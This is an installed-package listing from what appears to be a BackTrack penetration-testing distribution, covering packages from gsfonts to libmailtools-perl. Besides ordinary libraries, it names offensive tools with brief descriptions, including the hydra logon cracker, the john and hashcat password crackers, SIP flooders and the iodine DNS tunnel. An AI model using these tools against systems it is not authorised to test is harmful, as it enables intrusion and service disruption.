ii gsfonts
1:8.11+urwcyr1.0.7~pre44-4
Fonts for the Ghostscript interpreter(s)
ii gstreamer0.10-plugins-base
GStreamer plugins from the "base" set
0.10.28-1
ii gstreamer0.10-plugins-good
GStreamer plugins from the "good" set
0.10.21-1ubuntu3
ii gstreamer0.10-pulseaudio
GStreamer plugin for PulseAudio
0.10.21-1ubuntu3
ii gstreamer0.10-x
GStreamer plugins for X11 and Pango
0.10.28-1
ii gtk2-engines
theme engines for GTK+ 2.x
1:2.20.0-0ubuntu1
ii gtk2-engines-murrine
cairo-based gtk+-2.0 theme engine
0.90.3+git20100323-0ubuntu3
ii gtk2-engines-pixbuf
Pixbuf-based theme for GTK+ 2.x
2.20.1-0ubuntu2
ii gvfs
userspace virtual filesystem - server
1.6.1-0ubuntu1build1
ii gvfs-backends
userspace virtual filesystem - backends
ii gzip
GNU compression utilities
1.3.12-9ubuntu1.1
ii hack-library
1.0-bt2
A collection of tools used for SIP attack tools.
ii hashcat
cpu based multihash cracker
0.36-bt4
ii hashcat-utils
0.3-bt3
Utilities for creating and manipulation wordlists
ii hdparm
9.15-1ubuntu9
tune hard disk parameters for high performance
ii hexedit
1.2.12-bt0
View and edit files in hexadecimal or in ASC
II.
ii hexinject
1.2-bt1
HexInject is a very versatile packet injector and sniffer, that provide a
command-line framework for raw network access.
ii hicolor-icon-theme
0.11-1
default fallback theme for FreeDesktop.org icon themes
ii honeycomb
0.7-bt6
Automated signature creation using honeypots.
ii honeyd
1.5c-bt3
Honeyd is a small daemon that creates virtual hosts on a network.
ii hostname
3.03ubuntu1
utility to set/show the host name or domain name
ii hpijs
3.10.2-2ubuntu2.2
HP Linux Printing and Imaging - gs IJS driver (hpijs)
ii hping2
2.0.0-rc3-bt2
hping is a command-line oriented TCP/IP packet assembler/analyzer.
ii hping3
20051105-bt2
hping is a command-line oriented TCP/IP packet assembler/analyzer. The
interface is inspired to the ping(8) unix command, but hping isn't only able
to sen
ii
httprint
301-bt2
httprint is a web server fingerprinting tool. It relies on web server

characteristics to accurately identify web servers, despite the fact that they
may h
ii humanity-icon-theme
Humanity Icon theme
0.5.2.1
ii hunspell-en-us
20070829-4ubuntu1
English_american dictionary for hunspell
ii hydra
6.3-bt6
A very fast network logon cracker which support many different services.
ii iaxflood
1.0-bt0
A UDP Inter-Asterisk_eXchange (i.e. IAX)
ii icedtea-6-jre-cacao
6b20-1.9.7-0ubuntu1~10.04.1
Alternative JVM for OpenJDK, using Cacao
ii icoutils
0.29.1-0ubuntu1~lucid
Create and extract MS Windows icons and cursors
ii ida-pro-free
5.0-bt3
The IDA Pro Disassembler and Debugger is an interactive, programmable,
extendible, multi-processor disassembler hosted on Windows, Linux, or Mac OS
X.
ii ifupdown
0.6.8ubuntu29.2
high level tools to configure network interfaces
ii
iisemulator
Emulation for the
IIS web server
0.95-3
ii ike-scan
1.9-bt2
ike-scan is a command-line tool that uses the IKE protocol to discover,
fingerprint and test IPsec VPN servers.
ii imagemagick
image manipulation programs
7:6.5.7.8-1ubuntu1.1
ii impacket-examples
0.9.6.0-bt1
A collection of Python classes focused on providing access to network packets.
ii indicator-applet
GNOME panel indicator applet
0.3.7-0ubuntu1
ii indicator-application
Application Indicators
0.0.19-0ubuntu4
ii indicator-messages
0.3.6-0ubuntu2
GNOME panel indicator applet for messages
ii indicator-sound
A system sound indicator.
0.2.6-0ubuntu1
ii info
4.13a.dfsg.1-5ubuntu1
Standalone GNU Info documentation browser
ii initramfs-tools
tools for generating an initramfs
0.92bubuntu78
ii initramfs-tools-bin
binaries used by initramfs-tools
0.92bubuntu78
ii initscripts
2.87dsf-4ubuntu17.2
scripts for initializing and shutting down the system
ii insserv
1.12.0-14
Tool to organize boot sequence using LSB init.d script dependencies
ii install-info
4.13a.dfsg.1-5ubuntu1
Manage installed documentation in info format
ii installation-report
system installation report
2.39ubuntu4
ii intel-gpu-tools
1.0.2+git20100324-0ubuntu1
tools for debugging the Intel graphics driver
ii intltool
0.41.0-0ubuntu1
Utility scripts for internationalizing XML
ii intltool-debian
0.35.0+20060710.1
Help i18n of RFC822 compliant config files
ii inviteflood
2.0-bt1
Command line tool to attempt to flood a specific destination.
ii iodine
0.6.0-rc1-bt2
This is a piece of software that lets you tunnel IPv4 data through a DNS
server. This can be usable in different situations where internet access is
firew
ii ipcalc
IPv4 Calculator
0.41-bt1
ii iproute
networking and traffic control tools
20091226-1
ii iptables
1.4.4-2ubuntu2
administration tools for packet filtering and NAT
ii iputils-ping
3:20071127-2ubuntu1
Tools to test the reachability of network hosts
ii iputils-tracepath
3:20071127-2ubuntu1
Tools to trace the network path to a remote host
ii irb
Interactive Ruby (irb)
4.2-2~uorppa0
ii irb1.8
Interactive Ruby (for Ruby 1.8)
1.8.7.249-2
ii irb1.9.2
Interactive Ruby (for Ruby 1.9.2)
1.9.2.z1-1ppa1~lucid
ii irpas
0.10-bt1
The idea is to implement small tools which can be scripted for larger tests
while using the protocols describd in standards or white papers. IRPAS is not
ii irqbalance
0.55+20091017-3ubuntu2
Daemon to balance interrupts for SMP systems
ii iso-codes
3.12.1-1
ISO language, territory, currency, script codes and their translations
ii iw
0.9.22-bt2
iw is a new nl80211 based CLI configuration utility for wireless devices.
ii iwar
0.08-bt1
iWar is a "war dialer" written completely in C for Unix types of operating
systems (Linux, FreeBSD, OpenBSD, etc). It is intended for legal phone
security
ii java-common
Base of all Java packages
0.34
ii john
1.7.6-jumbo-12-bt5
John the Ripper is a fast password cracker. Besides several crypt(3) password
hash types most commonly found on various Unix flavors, supported out of the
ii joomscan
0.0.4-bt2
Detects file inclusion, sql injection, command execution vulnerabilities of a
target Joomla! web site.
ii kbd
1.15-1ubuntu3
Linux console font and keytable utilities
ii keepnote
0.7.1-bt0
A note taking and organization application.
ii kernel-package
12.032
A utility for building Linux kernel related Debian packages.
ii keyutils
Linux Key Management Utilities
1.2-12
ii kismet
201103r2-bt1
An 802.11 layer2 wireless network detector, sniffer, and intrusion detection
system.
ii klibc-utils
1.5.17-4ubuntu1
small utilities built with klibc for early boot
ii lame
An MP3 encoding library (frontend)
3.98.2+debian-0ubuntu3
ii landscape-common
11.02-0ubuntu0.10.04.1
The Landscape administration system client
ii language-pack-en
1:10.04+20110204
translation updates for language English
ii language-pack-en-base
translations for language English
1:10.04+20110204
ii language-selector-common
Language selector for Ubuntu Linux
0.5.8
ii lanmap2
1.0-bt1
Builds database/visualizations of LAN structure from passively sifted
information.
ii laptop-detect
attempt to detect a laptop
0.13.7ubuntu2
ii launchpad-integration
launchpad integration
0.1.35
ii lbd
0.2-bt2
lbd (load balancing detector) detects if a given domain uses DNS and/or HTTP
Load-Balancing.
ii less
pager program similar to more
436-1
ii libaa1
asc
ii art library
1.4p5-38build1
ii libaccess-bridge-java
Java Access Bridge for GNOME
1.26.2-3
ii libaccess-bridge-java-jni
1.26.2-3
Java Access Bridge for GNOME (jni bindings)
ii libacl1
Access control list shared library
2.2.49-2
ii libamd2.2.0
1:3.4.0-1ubuntu3
approximate minimum degree ordering library for sparse matrices
ii libao2
Cross Platform Audio Output Library
0.8.8-5ubuntu2
ii libapache2-mod-php5
5.3.2-1ubuntu4.9
server-side, HTML-embedded scripting language (Apache 2 module)
ii libapparmor-perl
AppArmor library Perl bindings
2.5.1-0ubuntu0.10.04.3
ii libapparmor1
changehat AppArmor library
2.5.1-0ubuntu0.10.04.3
ii libappindicator0
Application Indicators
0.0.19-0ubuntu4
ii libapr1
The Apache Portable Runtime Library
1.3.8-1build1
ii libaprutil1
1.3.9+dfsg-3ubuntu0.10.04.1
The Apache Portable Runtime Utility Library
ii libaprutil1-dbd-sqlite3
1.3.9+dfsg-3ubuntu0.10.04.1
The Apache Portable Runtime Utility Library - SQLite3 Driver
ii libaprutil1-ldap
1.3.9+dfsg-3ubuntu0.10.04.1
The Apache Portable Runtime Utility Library - LDAP Driver
ii libarchive1
2.8.0-2
Single library to read/write tar, cpio, pax, zip, iso9660, etc.
ii libart-2.0-2
2.3.20-2build1
Library of functions for 2D graphics - runtime files
ii libasound2
shared library for ALSA applications
1.0.22-0ubuntu7
ii libasound2-dev
1.0.22-0ubuntu7
shared library for ALSA applications -- development files
ii libasound2-plugins
ALSA library additional plugins
1.0.22-0ubuntu6
ii libaspell15
0.60.6-3ubuntu1
GNU Aspell spell-checker runtime library
ii libast2
the Library of Assorted Spiffy Things
0.7-3
ii libatasmart4
0.17+git20100219-1git2
ATA S.M.A.R.T. reading and parsing library
ii libatk1.0-0
The ATK accessibility toolkit
1.30.0-0ubuntu2.1
ii libatk1.0-data
1.30.0-0ubuntu2.1
Common files for the ATK accessibility toolkit
ii libatm1
1:2.5.1-1.2
shared library for ATM (Asynchronous Transfer Mode)
ii libatspi1.0-0
1.30.1-0ubuntu1
C binding libraries of at-spi for GNOME Accessibility
ii libattr1
Extended attribute shared library
1:2.4.44-1
ii libaudio2
Network Audio System - shared libraries
1.9.2-3
ii libaudiofile0
0.2.6-8ubuntu1
Open-source version of SGI's audiofile library
ii libavahi-client3
Avahi client library
0.6.25-1ubuntu6.2
ii libavahi-common-data
Avahi common data files
0.6.25-1ubuntu6.2
ii libavahi-common3
Avahi common library
0.6.25-1ubuntu6.2
ii libavahi-compat-libdnssd1
0.6.25-1ubuntu6.2
Avahi Apple Bonjour compatibility library
ii libavahi-core6
Avahi's embeddable mDNS/DNS-SD library
0.6.25-1ubuntu6.2
ii libavahi-glib1
Avahi glib integration library
0.6.25-1ubuntu6.2
ii libavc1394-0
control IEEE 1394 audio/video devices
0.5.3-1build4
ii libavcodec52
ffmpeg codec library
4:0.5.1-1ubuntu1.1
ii libavformat52
ffmpeg file format library
4:0.5.1-1ubuntu1.1
ii libavutil49
ffmpeg utility library
4:0.5.1-1ubuntu1.1
ii libbfb0
bfb protocol library
0.23-1
ii libbind9-60
BIND9 Shared Library used by BIND
ii libblas3gf
1.2-2build1
Basic Linear Algebra Subroutines 3, shared library
ii libblkid1
block device id library
2.17.2-0ubuntu1.10.04.2
ii libbluetooth3
4.60-0ubuntu8
Library to use the BlueZ Linux Bluetooth stack
ii libbonobo2-0
Bonobo CORBA interfaces library
2.24.3-0ubuntu1
ii libbonobo2-common
2.24.3-0ubuntu1
Bonobo CORBA interfaces library -- support files
ii libbonoboui2-0
The Bonobo UI library
2.24.3-0ubuntu1
ii libbonoboui2-common
The Bonobo UI library -- common files
2.24.3-0ubuntu1
ii libboost-filesystem1.40.0
1.40.0-4ubuntu4
filesystem operations (portable paths, iteration over directories, etc) in C++
ii libboost-python1.40.0
Boost.Python Library
1.40.0-4ubuntu4
ii libboost-regex1.40.0
regular expression library for C++
1.40.0-4ubuntu4
ii libboost-system1.40.0
1.40.0-4ubuntu4
Operating system (e.g. diagnostics support) library
ii libboost-thread1.40.0
portable C++ multi-threading
1.40.0-4ubuntu4
ii libbsd0
0.2.0-1
utility functions from BSD systems - shared library
ii libbz2-1.0
1.0.5-4ubuntu0.1
high-quality block-sorting file compressor library - runtime
ii libc-ares2
library for asyncronous name resolves
1.7.0-1
ii libc-bin
Embedded GNU C Library: Binaries
2.11.1-0ubuntu7.8
ii libc-dev-bin
2.11.1-0ubuntu7.8
Embedded GNU C Library: Development binaries
ii libc6
2.11.1-0ubuntu7.8
Embedded GNU C Library: Shared libraries
ii libc6-dev
2.11.1-0ubuntu7.8
Embedded GNU C Library: Development Libraries and Header Files
ii libc6-i686
2.11.1-0ubuntu7.8
GNU C Library: Shared libraries [i686 optimized]
ii libcaca0
colour ASC
II art library
0.99.beta16-3
ii libcairo2
The Cairo 2D vector graphics library
1.8.10-2ubuntu1
ii libcairomm-1.0-1
1.8.4-0ubuntu1
C++ wrappers for Cairo (shared libraries)
ii libcamel1.2-14
2.28.3.1-0ubuntu6
The Evolution MIME message handling library
ii libcanberra-gtk-module
0.22-1ubuntu2
translates Gtk+ widgets signals to event sounds
ii libcanberra-gtk0
0.22-1ubuntu2
Gtk+ helper for playing widget event sounds with libcanberra
ii libcanberra0
0.22-1ubuntu2
a simple abstract interface for playing event sounds
ii libcap-ng0
An alternate posix capabilities library
0.6.2-4
ii libcap2
1:2.17-2ubuntu1
support for getting/setting POSIX.1e capabilities
ii libcap2-bin
1:2.17-2ubuntu1
basic utility programs for using capabilities
ii libccid
1.3.11-1
PC/SC driver for USB CCID smart card readers
ii libcdio-cdda0
0.81-4
library to read and control digital audio CDs
ii libcdio-paranoia0
0.81-4
library to read digital audio CDs with error correction
ii libcdio10
library to read and control CD-ROM
0.81-4
ii libcdparanoia0
3.10.2+debian-9
audio extraction tool for sampling CDs (library)
ii libck-connector0
ConsoleKit libraries
0.4.1-3ubuntu2
ii libclass-accessor-perl
0.34-1
Perl module that automatically generates accessors
ii libclutter-1.0-0
1.2.4-0ubuntu1
Open GL based interactive canvas library
ii libcomerr2
common error description library
1.41.11-1ubuntu2.1
ii libcroco3
0.6.2-1
a generic Cascading Style Sheet (CSS) parsing and manipulation toolkit
ii libcups2
1.4.3-1ubuntu1.4
Common UNIX Printing System(tm) - Core library
ii libcupscgi1
1.4.3-1ubuntu1.4
Common UNIX Printing System(tm) - CGI library
ii libcupsdriver1
1.4.3-1ubuntu1.4
Common UNIX Printing System(tm) - Driver library
ii libcupsimage2
1.4.3-1ubuntu1.4
Common UNIX Printing System(tm) - Raster image library
ii libcupsmime1
1.4.3-1ubuntu1.4
Common UNIX Printing System(tm) - MIME library
ii libcupsppdc1
1.4.3-1ubuntu1.4
Common UNIX Printing System(tm) - PPD manipulation library
ii libcurl3
7.19.7-1ubuntu1
Multi-protocol file transfer library (OpenSSL)
ii libcurl3-gnutls
7.19.7-1ubuntu1
Multi-protocol file transfer library (GnuTLS)
ii libcurses-perl
Curses interface for Perl
1.28-1
ii libcurses-ui-perl
0.9607-1
curses-based OO user interface framework for Perl
ii libcwidget3
0.5.13-1ubuntu1
high-level terminal interface library for C++ (runtime files)
ii libdaemon0
0.14-2
lightweight C library for daemons - runtime library
ii libdatrie1
Double-array trie library
0.2.2-3
ii libdb4.6
4.6.21-16
Berkeley v4.6 Database Libraries [runtime]
ii libdb4.8
4.8.24-1ubuntu1
Berkeley v4.8 Database Libraries [runtime]
ii libdbd-mysql-perl
4.012-1ubuntu1
A Perl5 database interface to the MySQL database
ii libdbd-sqlite3-perl
1.29-1
Perl DBI driver with a self-contained RDBMS
ii libdbi-perl
Perl Database Interface (DBI)
1.609-1build1
ii libdbus-1-3
simple interprocess messaging system
1.2.16-2ubuntu4.2
ii libdbus-glib-1-2
0.84-1
simple interprocess messaging system (GLib-based shared library)
ii libdbusmenu-glib1
Menus over DBus shared library for glib
0.2.9-0ubuntu3.1
ii libdbusmenu-gtk1
Menus over DBus shared library for GTK
0.2.9-0ubuntu3.1
ii libdebconfclient0
0.147
Debian Configuration Management System (C-implementation)
ii libdebian-installer4
0.68ubuntu3
Library of common debian-installer functions
ii libdevkit-power-gobject1
1:0.9.1-1
abstraction for power management - shared library (old ABI)
ii libdevmapper1.02.1
2:1.02.39-1ubuntu4.1
The Linux Kernel Device Mapper userspace library
ii libdigest-hmac-perl
1.01-7
create standard message integrity checks
ii libdigest-sha1-perl
NIST SHA-1 message digest algorithm
2.12-1build1
ii libdirectfb-1.2-0
1.2.8-5ubuntu2
direct frame buffer graphics - shared libraries
ii libdiscover2
hardware identification library
2.1.2-3
ii libdjvulibre-text
3.5.22-1ubuntu4.1
Linguistic support files for libdjvulibre
ii libdjvulibre21
3.5.22-1ubuntu4.1
Runtime support for the DjVu image format
ii libdmraid1.0.0.rc16
1.0.0.rc16-3ubuntu2
Device-Mapper Software RAID support tool - shared library
ii libdnet
DECnet Libraries
2.49ubuntu1
ii libdnet-dev
DECnet development libraries & Headers
2.49ubuntu1
ii libdns64
DNS Shared Library used by BIND
ii libdrm-intel1
2.4.18-1ubuntu3
Userspace interface to intel-specific kernel DRM services -- runtime
ii libdrm-nouveau1
2.4.18-1ubuntu3
Userspace interface to nouveau-specific kernel DRM services -- runtime
ii libdrm-radeon1
2.4.18-1ubuntu3
Userspace interface to radeon-specific kernel DRM services -- runtime
ii libdrm2
2.4.18-1ubuntu3
Userspace interface to kernel DRM services -- runtime
ii libdumbnet-dev
1.12-3
A dumb, portable networking library -- development files
ii libdumbnet1
1.12-3
A dumb, portable networking library -- shared library
ii libdv4
1.0.0-2ubuntu2
software library for DV format digital video (runtime lib)
ii libebackend1.2-0
2.28.3.1-0ubuntu6
Utility library for evolution data servers
ii libebook1.2-9
2.28.3.1-0ubuntu6
Client library for evolution address books
ii libecal1.2-7
Client library for evolution calendars
2.28.3.1-0ubuntu6
ii libecryptfs0
83-0ubuntu3.1
ecryptfs cryptographic filesystem (library)
ii libedata-book1.2-2
2.28.3.1-0ubuntu6
Backend library for evolution address books
ii libedata-cal1.2-6
Backend library for evolution calendars
2.28.3.1-0ubuntu6
ii libedataserver1.2-11
2.28.3.1-0ubuntu6
Utility library for evolution data servers
ii libedataserverui1.2-8
2.28.3.1-0ubuntu6
GUI utility library for evolution data servers
ii libedit2
BSD editline and history libraries
2.11-20080614-1build1
ii libeggdbus-1-0
D-Bus bindings for GObject
0.6-1
ii libegroupwise1.2-13
2.28.3.1-0ubuntu6
Client library for accessing groupwise POA through SOAP interface
ii libelf1
library to read and write ELF files
0.143-1
ii libenchant1c2a
1.6.0-0ubuntu1
a wrapper library for various spell checker engines
ii libept0
0.5.30
High-level library for managing Debian package information
ii liberror-perl
0.17-1
Perl module for error/exception handling in an OO-ish way
ii libesd0
0.2.41-6ubuntu1
Enlightened Sound Daemon - Shared libraries
ii libestools1.2
Edinburgh Speech Tools Library
1:1.2.96~beta-6
ii libevent-1.4-2
1.4.13-stable-1
An asynchronous event notification library
ii libevent-core-1.4-2
1.4.13-stable-1
An asynchronous event notification library (core)
ii libevent-dev
1.4.13-stable-1
Development libraries, header files and docs for libevent
ii libevent-extra-1.4-2
1.4.13-stable-1
An asynchronous event notification library (extra)
ii libewf1
20100119-1
library with support for Expert Witness Compression Format
ii libexempi3
library to parse XMP metadata (Library)
2.1.1-1build2
ii libexif12
library to parse EXIF files
0.6.19-1
ii libexiv2-6
EXIF/IPTC metadata manipulation library
0.19-1
ii libexpat1
XML parsing C library - runtime library
2.0.1-7ubuntu1
ii libextractor-plugins
0.5.23+dfsg-4build1
extracts meta-data from files of arbitrary type (plugins)
ii libextractor1c2a
0.5.23+dfsg-4build1
extracts meta-data from files of arbitrary type (library)
ii libfbclient2
Firebird client library
2.1.3.18185-0.ds1-6build1
ii libffi5
3.0.9-1
Foreign Function Interface library runtime
ii libfile-copy-recursive-perl
0.38-1
Perl extension for recursively copying files and directories
ii libfile-homedir-perl
0.86-1
Get the home directory for yourself or other users in Perl
ii libfile-which-perl
1.08-1
Perl module for searching paths for executable programs
ii libflac8
1.2.1-2build2
Free Lossless Audio Codec - runtime C library
ii libfont-afm-perl
1.20-1
Font::AFM - Interface to Adobe Font Metrics files
ii libfontconfig1
2.8.0-2ubuntu1
generic font configuration library - runtime
ii libfontenc1
X11 font encoding library
1:1.0.5-1
ii libfreetype6
2.3.11-1ubuntu2.4
FreeType 2 font engine, shared library files
ii libfribidi0
0.19.2-1
Free Implementation of the Unicode BiDi algorithm
ii libfs6
X11 Font Services library
2:1.0.2-1build1
ii libfuse2
Filesystem in USErspace library
2.8.1-1.1ubuntu3.1
ii libgail18
2.20.1-0ubuntu2
GNOME Accessibility Implementation Library -- shared libraries
ii libgamin0
0.1.10-1ubuntu3
Client library for the gamin file and directory monitoring system
ii libgc1c2
1:6.8-1.2ubuntu1
conservative garbage collector for C and C++
ii libgcc1
GCC support library
1:4.4.3-4ubuntu5
ii libgconf2-4
2.28.1-0ubuntu1
GNOME configuration database system (shared libraries)
ii libgcr0
2.92.92.is.2.30.3-0ubuntu1.1
Library for Crypto UI related task - runtime
ii libgcrypt11
LGPL Crypto library - runtime library
1.4.4-5ubuntu2
ii libgd2-noxpm
2.0.36~rc1~dfsg-3.1ubuntu1
GD Graphics Library version 2 (without XPM support)
ii libgdata-google1.2-1
2.28.3.1-0ubuntu6
Client library for accessing Google POA through SOAP interface
ii libgdata1.2-1
2.28.3.1-0ubuntu6
Client library for accessing Google POA through SOAP interface
ii libgdbm3
1.8.3-9
GNU dbm database routines (runtime version)
ii libgdu0
GObject based Disk Utility Library
2.30.1-1
ii libgeoip1
1.4.6.dfsg-17
A non-DNS IP-to-country resolver library
ii libgfortran3
4.4.3-4ubuntu5
Runtime library for GNU Fortran applications
ii libgif-dev
library for GIF images (development)
4.1.6-9
ii libgif4
library for GIF images (library)
4.1.6-9
ii libgirepository1.0-0
0.6.8-1
Library for handling GObject introspection data (runtime library)
ii libgjs0
0.5-1ubuntu2.3
Mozilla-based javascript bindings for the GNOME platform
ii libgksu2-0
2.0.13~pre1-1ubuntu4.1
library providing su and sudo functionality
ii libgl1-mesa-dri
7.7.1-1ubuntu3
A free implementation of the OpenGL API -- DRI modules
ii libgl1-mesa-glx
7.7.1-1ubuntu3
A free implementation of the OpenGL API -- GLX runtime
ii libglade2-0
library to load .glade files at runtime
1:2.6.4-1build1
ii libglib2.0-0
The GLib library of C routines
2.24.1-0ubuntu1
ii libglib2.0-data
Common files for GLib library
2.24.1-0ubuntu1
ii libglibmm-2.4-1c2a
2.24.2-0ubuntu1
C++ wrapper for the GLib toolkit (shared libraries)
ii libglu1-mesa
The OpenGL utility library (GLU)
7.7.1-1ubuntu3
ii libgmp3c2
Multiprecision arithmetic library
2:4.3.2+dfsg-1ubuntu1
ii libgnome-desktop-2-17
1:2.30.2-0ubuntu1
Utility library for loading .desktop files - runtime files
ii libgnome-keyring0
GNOME keyring services library
2.30.1-0ubuntu1
ii libgnome-media0
2.30.0-0ubuntu1
runtime libraries for the GNOME media utilities
ii libgnome-menu2
2.30.0-0ubuntu4
ii libgnome-window-settings1
1:2.30.1-0ubuntu1
Utility library for getting window manager settings
ii libgnome2-0
The GNOME library - runtime files
2.30.0-0ubuntu1
ii libgnome2-common
The GNOME library - common files
2.30.0-0ubuntu1
ii libgnomecanvas2-0
2.30.1-0ubuntu1
A powerful object-oriented display - runtime files
ii libgnomecanvas2-common
2.30.1-0ubuntu1
A powerful object-oriented display - common files
ii libgnomekbd-common
2.30.2-0ubuntu0.1
GNOME library to manage keyboard configuration - common files
ii libgnomekbd4
2.30.2-0ubuntu0.1
GNOME library to manage keyboard configuration - shared library
ii libgnomeui-0
2.24.3-1
The GNOME libraries (User Interface) - runtime files
ii libgnomeui-common
2.24.3-1
The GNOME libraries (User Interface) - common files
ii libgnomevfs2-0
1:2.24.2-1ubuntu2
GNOME Virtual File System (runtime libraries)
ii libgnomevfs2-common
1:2.24.2-1ubuntu2
GNOME Virtual File System (common files)
ii libgnutls26
the GNU TLS library - runtime library
2.8.5-2
ii libgomp1
GCC OpenMP (GOMP) support library
4.4.3-4ubuntu5
ii libgp11-0
2.92.92.is.2.30.3-0ubuntu1.1
Glib wrapper library for PKCS#11 - runtime
ii libgpg-error0
1.6-1ubuntu2
library for common error values and messages in GnuPG components
ii libgphoto2-2
gphoto2 digital camera library
2.4.8-0ubuntu2
ii libgphoto2-port0
gphoto2 digital camera port library
2.4.8-0ubuntu2
ii libgpm2
General Purpose Mouse - shared library
1.20.4-3.2ubuntu2
ii libgps19
Global Positioning System - library
2.92-4
ii libgraphviz4
rich set of graph drawing tools
2.20.2-8ubuntu3
ii libgs8
The Ghostscript PostScript/PDF interpreter Library
ii libgsf-1-114
1.14.16-1ubuntu1
Structured File Library - runtime version
ii libgsf-1-common
Structured File Library - common files
1.14.16-1ubuntu1
ii libgsm1
1.0.13-3
Shared libraries for GSM speech compressor
ii libgsm1-dev
1.0.13-3
Development libraries for a GSM speech compressor
ii libgssapi-krb5-2
1.8.1+dfsg-2ubuntu0.9
MIT Kerberos runtime libraries - krb5 GSS-API Mechanism
ii libgssglue1
mechanism-switch gssapi library
0.1-4
ii libgstreamer-plugins-base0.10-0
GStreamer libraries from the "base" set
0.10.28-1
ii libgstreamer0.10-0
Core GStreamer libraries and elements
0.10.28-1
ii libgtk2.0-0
2.20.1-0ubuntu2
The GTK+ graphical user interface library
ii libgtk2.0-bin
2.20.1-0ubuntu2
The programs for the GTK+ graphical user interface library
ii libgtk2.0-common
2.20.1-0ubuntu2
Common files for the GTK+ graphical user interface library
ii libgtkmm-2.4-1c2a
1:2.20.3-0ubuntu1
C++ wrappers for GTK+ (shared libraries)
ii libgtksourceview2.0-0
2.10.4-0ubuntu1
shared libraries for the GTK+ syntax highlighting widget
ii libgtksourceview2.0-common
2.10.4-0ubuntu1
common files for the GTK+ syntax highlighting widget
ii libgtop2-7
gtop system monitoring library
2.26.1-0ubuntu2
ii libgtop2-common
2.26.1-0ubuntu2
common files for the gtop system monitoring library
ii libgucharmap7
1:2.30.0-0ubuntu1
Unicode browser widget library (shared library)
ii libgudev-1.0-0
1:151-12.3
GObject-based wrapper library for libudev
ii libgutenprint2
5.2.5-0ubuntu1.1
runtime for the Gutenprint printer driver library
ii libgvfscommon0
userspace virtual filesystem - library
ii libgweather-common
GWeather common files
2.30.0-0ubuntu1
ii libgweather1
GWeather shared library
2.30.0-0ubuntu1
ii libhal-storage1
0.5.14-0ubuntu6
Hardware Abstraction Layer - shared library for storage devices
ii libhal1
0.5.14-0ubuntu6
Hardware Abstraction Layer - shared library
ii libhpmud0
3.10.2-2ubuntu2.2
HP Multi-Point Transport Driver (hpmud) run-time libraries
ii libhtml-format-perl
2.04-2
format HTML syntax trees into text, PostScript or RTF
ii libhtml-parser-perl
3.64-1
collection of modules that parse HTML text documents
ii libhtml-tagset-perl
Data tables pertaining to HTML
3.20-2
ii libhtml-template-perl
2.9-1
HTML::Template : A module for using HTML Templates with Perl
ii libhtml-tree-perl
represent and create HTML syntax trees
3.23-1
ii libhttp-server-simple-perl
simple stand-alone HTTP server
0.41-1
ii libhunspell-1.2-0
1.2.8-6ubuntu1
spell checker and morphological analyzer (shared library)
ii libiaxclient-dev
2.0.2-3build1
Portable IAX(2) protocol telephony client - development files
ii libiaxclient1
2.0.2-3build1
Portable IAX(2) protocol telephony client - shared library
ii libical0
0.44-3
iCalendar library implementation in C (runtime)
ii libice-dev
2:1.0.6-1
X11 Inter-Client Exchange library (development headers)
ii libice6
X11 Inter-Client Exchange library
2:1.0.6-1
ii libicu42
International Components for Unicode
4.2.1-3
ii libid3tag0
0.15.1b-10build2
ID3 tag reading library from the MAD project
ii libidl0
library for parsing CORBA IDL files
0.8.13-1
ii libidn11
1.15-2
GNU Libidn library, implementation of IETF IDN specifications
ii libido-0.1-0
0.1.6-0ubuntu1
Shared library providing extra gtk menu items for display in
ii libiec61883-0
an partial implementation of IEC 61883
1.2.0-0.1build1
ii libijs-0.35
0.35-7build1
IJS raster image transport protocol: shared library
ii libilmbase6
1.0.1-3build2
several utility libraries from ILM used by OpenEXR
ii libimage-exiftool-perl
7.89-1
Library and program to read and write meta information in multimedia files
ii libimlib2
1.4.2-5build1
powerful image loading and rendering library
ii libimobiledevice0
0.9.7-1ubuntu1
Library for communicating with the iPhone and iPod Touch
ii libindicate4
0.3.6-0ubuntu1
GNOME panel indicator applet - shared library
ii libindicator0
0.3.8-0ubuntu1
GNOME panel indicator applet - shared library
ii libio-socket-ssl-perl
1.31-1
Perl module implementing object oriented interface to SSL sockets
ii libio-string-perl
1.08-2
Emulate IO::File interface for in-core strings
ii libisc60
ISC Shared Library used by BIND
ii libisccc60
Command Channel Library used by BIND
ii libisccfg60
Config File Handling Library used by BIND
ii libiw30
Wireless tools - library
30~pre9-3ubuntu4
ii libjack0
JACK Audio Connection Kit (libraries)
0.118+svn3796-1ubuntu2
ii libjasper1
The JasPer JPEG-2000 runtime library
1.900.1-7
ii libjpeg62
6b-15ubuntu1
The Independent JPEG Group's JPEG runtime library
ii libjpeg62-dev
6b-15ubuntu1
Development files for the IJG JPEG library
ii libjs-jquery
1.3.3-2ubuntu1
JavaScript library for dynamic web applications
ii libjson-glib-1.0-0
GLib JSON manipulation library
0.7.6-0ubuntu2
ii libjudydebian1
1.0.5-1
C library for creating and accessing dynamic arrays
ii libk5crypto3
MIT Kerberos runtime libraries - Crypto Library
ii libkeyutils1
1.2-12
Linux Key Management Utilities (library)
ii libklibc
1.5.17-4ubuntu1
minimal libc subset for use with initramfs
ii libkpathsea5
2009-5ubuntu0.2
TeX Live: path search library for TeX (runtime part)
ii libkrb5-3
MIT Kerberos runtime libraries
ii libkrb5support0
MIT Kerberos runtime libraries - Support library
ii liblapack3gf
3.2.1-2
library of linear algebra routines 3 - shared version
ii liblaunchpad-integration1
library for launchpad integration
0.1.35
ii liblcms1
Color management library
1.18.dfsg-1ubuntu2.10.04.1
ii libldap-2.4-2
OpenLDAP libraries
2.4.21-0ubuntu5.4
ii liblocale-gettext-perl
1.05-6
Using libc functions for internationalization in Perl
ii liblockfile1
1.08-3ubuntu1
NFS-safe locking library, includes dotlockfile program
ii liblog4cpp5
1.0-4
C++ library for flexible logging (runtime)
ii libltdl7
2.2.6b-2ubuntu1
A system independent dlopen wrapper for GNU libtool
ii liblua5.1-0
5.1.4-5
Simple, extensible, embeddable programming language
ii liblwres60
Lightweight Resolver Library used by BIND
ii liblzma1
XZ-format compression library
4.999.9beta+20091116-1
ii liblzo2-2
data compression library
2.03-2
ii libmad0
MPEG audio decoder library
0.15.1b-4ubuntu1
ii libmagic1
5.03-5ubuntu1
File type determination library using "magic" numbers
ii libmagickcore2
low-level image manipulation library
7:6.5.7.8-1ubuntu1.1
ii libmagickcore2-extra
7:6.5.7.8-1ubuntu1.1
low-level image manipulation library - extra codecs
ii libmagickwand2
image manipulation library
7:6.5.7.8-1ubuntu1.1
ii libmail-sendmail-perl
Send email from a perl script
0.79.16-1
ii libmailtools-perl
Manipulate email in perl programs
